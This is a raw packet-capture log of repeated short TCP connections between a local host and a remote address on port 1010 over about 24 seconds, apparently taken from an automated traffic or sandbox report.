                                            Nov 1, 2024 06:22:25.825722933 CET497651010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:22:25.831444025 CET101049765147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:22:25.831499100 CET497651010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:22:25.935224056 CET497661010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:22:25.940327883 CET101049766147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:22:25.940393925 CET497661010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:22:25.965010881 CET497661010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:22:25.969834089 CET101049766147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:22:25.971904993 CET497661010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:22:25.976953983 CET101049766147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:22:26.614531994 CET101049766147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:22:26.647937059 CET101049766147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:22:26.648168087 CET497661010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:22:26.652465105 CET497661010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:22:26.657912970 CET101049766147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:22:26.658018112 CET497661010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:22:26.763302088 CET497671010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:22:26.768654108 CET101049767147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:22:26.769180059 CET497671010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:22:26.868828058 CET497671010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:22:26.873754978 CET101049767147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:22:26.873883009 CET497671010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:22:26.878802061 CET101049767147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:22:27.456938982 CET101049767147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:22:27.490266085 CET101049767147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:22:27.490319014 CET497671010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:22:27.490828037 CET497671010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:22:27.496052027 CET101049767147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:22:27.496117115 CET497671010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:22:27.608067989 CET497681010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:22:27.613142967 CET101049768147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:22:27.613225937 CET497681010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:22:27.704746962 CET497681010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:22:27.709659100 CET101049768147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:22:27.709712982 CET497681010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:22:27.714713097 CET101049768147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:22:28.290462971 CET101049768147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:22:28.323373079 CET101049768147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:22:28.323455095 CET497681010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:22:28.323981047 CET497681010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:22:28.329288006 CET101049768147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:22:28.329432011 CET497681010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:22:28.435475111 CET497691010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:22:28.747848034 CET101049769147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:22:28.747984886 CET497691010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:22:28.788151979 CET497691010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:22:28.793034077 CET101049769147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:22:28.793425083 CET497691010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:22:28.798286915 CET101049769147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:22:29.431521893 CET101049769147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:22:29.464847088 CET101049769147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:22:29.464906931 CET497691010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:22:29.465465069 CET497691010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:22:29.470599890 CET101049769147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:22:29.472487926 CET497691010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:22:29.575911045 CET497701010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:22:29.580765009 CET101049770147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:22:29.580864906 CET497701010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:22:29.605417013 CET497701010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:22:29.610322952 CET101049770147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:22:29.610378027 CET497701010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:22:29.615176916 CET101049770147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:22:30.257698059 CET101049770147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:22:30.288206100 CET101049770147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:22:30.288263083 CET497701010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:22:30.288922071 CET497701010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:22:30.294322968 CET101049770147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:22:30.294392109 CET497701010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:22:30.426146030 CET497711010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:22:30.432257891 CET101049771147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:22:30.432344913 CET497711010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:22:30.467297077 CET497711010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:22:30.472193956 CET101049771147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:22:30.472249985 CET497711010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:22:30.477112055 CET101049771147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:22:31.136651039 CET101049771147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:22:31.170106888 CET101049771147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:22:31.170157909 CET497711010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:22:31.170986891 CET497711010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:22:31.176287889 CET101049771147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:22:31.176356077 CET497711010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:22:31.332947969 CET497721010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:22:31.338387012 CET101049772147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:22:31.338499069 CET497721010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:22:31.564812899 CET497721010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:22:31.570822001 CET101049772147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:22:31.571253061 CET497721010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:22:31.577096939 CET101049772147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:22:32.864028931 CET101049772147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:22:32.864226103 CET101049772147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:22:32.864281893 CET497721010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:22:32.864496946 CET101049772147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:22:32.864645004 CET101049772147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:22:32.864681005 CET497721010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:22:32.864698887 CET497721010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:22:32.865225077 CET497721010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:22:32.866051912 CET101049772147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:22:32.866117001 CET497721010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:22:32.873358011 CET101049772147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:22:32.873419046 CET497721010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:22:32.982737064 CET497731010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:22:32.987612009 CET101049773147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:22:32.987754107 CET497731010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:22:33.010862112 CET497731010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:22:33.015805960 CET101049773147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:22:33.015897036 CET497731010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:22:33.020684958 CET101049773147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:22:33.692699909 CET101049773147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:22:33.726639986 CET101049773147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:22:33.727061987 CET497731010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:22:33.727355957 CET497731010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:22:33.732830048 CET101049773147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:22:33.732909918 CET497731010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:22:33.888537884 CET497741010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:22:33.893549919 CET101049774147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:22:33.893995047 CET497741010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:22:34.562972069 CET497741010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:22:34.567971945 CET101049774147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:22:34.568033934 CET497741010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:22:34.572885990 CET101049774147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:22:34.742211103 CET101049774147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:22:34.775629997 CET101049774147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:22:34.775820017 CET497741010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:22:34.776345015 CET497741010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:22:34.781712055 CET101049774147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:22:34.781884909 CET497741010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:22:34.888359070 CET497751010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:22:34.894890070 CET101049775147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:22:34.895180941 CET497751010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:22:34.961560965 CET497751010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:22:35.165930986 CET101049775147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:22:35.166595936 CET497751010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:22:35.171660900 CET101049775147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:22:35.570769072 CET101049775147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:22:35.603810072 CET101049775147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:22:35.603924036 CET497751010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:22:35.604415894 CET497751010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:22:35.609927893 CET101049775147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:22:35.610023022 CET497751010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:22:35.716473103 CET497761010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:22:35.721330881 CET101049776147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:22:35.721523046 CET497761010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:22:35.843606949 CET497761010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:22:35.848576069 CET101049776147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:22:35.848630905 CET497761010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:22:35.853446960 CET101049776147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:22:36.408502102 CET101049776147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:22:36.441198111 CET101049776147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:22:36.441260099 CET497761010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:22:36.442066908 CET497761010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:22:36.447249889 CET101049776147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:22:36.447305918 CET497761010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:22:36.577241898 CET497771010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:22:36.582279921 CET101049777147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:22:36.582658052 CET497771010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:22:36.674210072 CET497771010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:22:36.679100037 CET101049777147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:22:36.682553053 CET497771010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:22:36.687381029 CET101049777147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:22:37.292285919 CET101049777147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:22:37.325301886 CET101049777147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:22:37.325371027 CET497771010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:22:37.325915098 CET497771010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:22:37.331020117 CET101049777147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:22:37.334585905 CET497771010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:22:37.439424038 CET497781010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:22:37.444403887 CET101049778147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:22:37.444473028 CET497781010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:22:37.484792948 CET497781010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:22:37.489633083 CET101049778147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:22:37.489686966 CET497781010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:22:37.494586945 CET101049778147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:22:38.353275061 CET101049778147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:22:38.354027033 CET101049778147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:22:38.354090929 CET497781010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:22:38.354595900 CET497781010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:22:38.354624033 CET101049778147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:22:38.354676008 CET497781010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:22:38.362281084 CET101049778147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:22:38.362339020 CET497781010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:22:38.466510057 CET497791010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:22:38.477936029 CET101049779147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:22:38.478012085 CET497791010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:22:38.508488894 CET497791010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:22:38.513341904 CET101049779147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:22:38.513400078 CET497791010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:22:38.518307924 CET101049779147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:22:39.145585060 CET101049779147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:22:39.178668022 CET101049779147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:22:39.178755999 CET497791010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:22:39.179285049 CET497791010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:22:39.184506893 CET101049779147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:22:39.184602022 CET497791010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:22:39.294560909 CET497801010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:22:39.299804926 CET101049780147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:22:39.299890995 CET497801010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:22:39.319892883 CET497801010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:22:39.325475931 CET101049780147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:22:39.325562954 CET497801010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:22:39.330974102 CET101049780147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:22:39.988459110 CET101049780147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:22:40.021609068 CET101049780147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:22:40.021684885 CET497801010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:22:40.022186041 CET497801010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:22:40.027360916 CET101049780147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:22:40.027462006 CET497801010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:22:40.138344049 CET497811010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:22:40.143376112 CET101049781147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:22:40.143454075 CET497811010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:22:40.162267923 CET497811010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:22:40.167069912 CET101049781147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:22:40.167129993 CET497811010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:22:40.172003984 CET101049781147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:22:40.826103926 CET101049781147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:22:40.858975887 CET101049781147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:22:40.859036922 CET497811010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:22:40.859549046 CET497811010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:22:40.865639925 CET101049781147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:22:40.865689039 CET497811010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:22:40.966511965 CET497821010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:22:40.971473932 CET101049782147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:22:40.971554041 CET497821010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:22:40.992080927 CET497821010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:22:40.996942043 CET101049782147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:22:40.997023106 CET497821010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:22:41.002037048 CET101049782147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:22:41.643166065 CET101049782147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:22:41.675985098 CET101049782147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:22:41.676078081 CET497821010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:22:41.676651001 CET497821010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:22:41.682357073 CET101049782147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:22:41.682423115 CET497821010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:22:41.794675112 CET497831010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:22:41.799582005 CET101049783147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:22:41.799666882 CET497831010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:22:41.826862097 CET497831010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:22:41.833735943 CET101049783147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:22:41.833811045 CET497831010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:22:41.838606119 CET101049783147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:22:42.483587027 CET101049783147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:22:42.507857084 CET101049783147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:22:42.507922888 CET497831010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:22:42.523613930 CET497831010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:22:42.529377937 CET101049783147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:22:42.529453039 CET497831010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:22:42.638384104 CET497841010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:22:42.643603086 CET101049784147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:22:42.644536972 CET497841010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:22:42.654119968 CET497841010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:22:42.658994913 CET101049784147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:22:42.660526991 CET497841010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:22:42.665674925 CET101049784147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:22:43.705363035 CET101049784147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:22:43.738430977 CET101049784147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:22:43.738509893 CET497841010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:22:43.739051104 CET497841010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:22:43.744288921 CET101049784147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:22:43.744343042 CET497841010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:22:43.857249022 CET497851010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:22:43.862888098 CET101049785147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:22:43.862979889 CET497851010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:22:43.894854069 CET497851010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:22:43.900600910 CET101049785147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:22:43.900676012 CET497851010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:22:43.910794020 CET101049785147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:22:44.572235107 CET101049785147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:22:44.605561972 CET101049785147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:22:44.605634928 CET497851010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:22:44.606152058 CET497851010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:22:44.611780882 CET101049785147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:22:44.611839056 CET497851010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:22:44.716428995 CET497861010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:22:44.721383095 CET101049786147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:22:44.721467018 CET497861010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:22:44.740907907 CET497861010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:22:44.746190071 CET101049786147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:22:44.746284008 CET497861010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:22:44.751147985 CET101049786147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:22:45.428061962 CET101049786147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:22:45.460829020 CET101049786147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:22:45.460889101 CET497861010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:22:45.461416006 CET497861010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:22:45.467192888 CET101049786147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:22:45.467240095 CET497861010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:22:45.578931093 CET497871010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:22:45.583889961 CET101049787147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:22:45.584012985 CET497871010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:22:45.658931971 CET497871010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:22:45.664009094 CET101049787147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:22:45.664067984 CET497871010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:22:45.668927908 CET101049787147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:22:46.260423899 CET101049787147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:22:46.293206930 CET101049787147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:22:46.293319941 CET497871010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:22:46.293798923 CET497871010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:22:46.299226046 CET101049787147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:22:46.299309969 CET497871010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:22:46.404398918 CET497881010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:22:46.409441948 CET101049788147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:22:46.409532070 CET497881010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:22:46.431483984 CET497881010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:22:46.436331987 CET101049788147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:22:46.436424017 CET497881010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:22:46.441463947 CET101049788147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:22:47.080460072 CET101049788147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:22:47.113658905 CET101049788147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:22:47.113739014 CET497881010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:22:47.114322901 CET497881010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:22:47.119824886 CET101049788147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:22:47.119899035 CET497881010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:22:47.232181072 CET497891010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:22:47.237529039 CET101049789147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:22:47.237615108 CET497891010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:22:47.259843111 CET497891010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:22:47.264709949 CET101049789147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:22:47.264837027 CET497891010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:22:47.269872904 CET101049789147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:22:47.921710014 CET101049789147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:22:47.954612970 CET101049789147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:22:47.954690933 CET497891010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:22:47.955404043 CET497891010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:22:47.960716009 CET101049789147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:22:47.960872889 CET497891010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:22:48.060425043 CET497901010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:22:48.065445900 CET101049790147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:22:48.066227913 CET497901010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:22:48.076024055 CET497901010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:22:48.080888033 CET101049790147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:22:48.082819939 CET497901010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:22:48.087642908 CET101049790147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:22:48.738660097 CET101049790147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:22:48.771917105 CET101049790147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:22:48.771969080 CET497901010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:22:48.773571014 CET497901010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:22:48.779228926 CET101049790147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:22:48.779299974 CET497901010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:22:48.944314003 CET497911010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:22:48.949325085 CET101049791147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:22:48.949465036 CET497911010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:22:48.969486952 CET497911010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:22:48.974354982 CET101049791147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:22:48.974435091 CET497911010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:22:48.979295969 CET101049791147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:22:49.623749971 CET101049791147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:22:49.657260895 CET101049791147.189.173.36192.168.2.4
                                            Nov 1, 2024 06:22:49.657329082 CET497911010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:22:49.657818079 CET497911010192.168.2.4147.189.173.36
                                            Nov 1, 2024 06:22:49.663192034 CET101049791147.189.173.36192.168.2.4
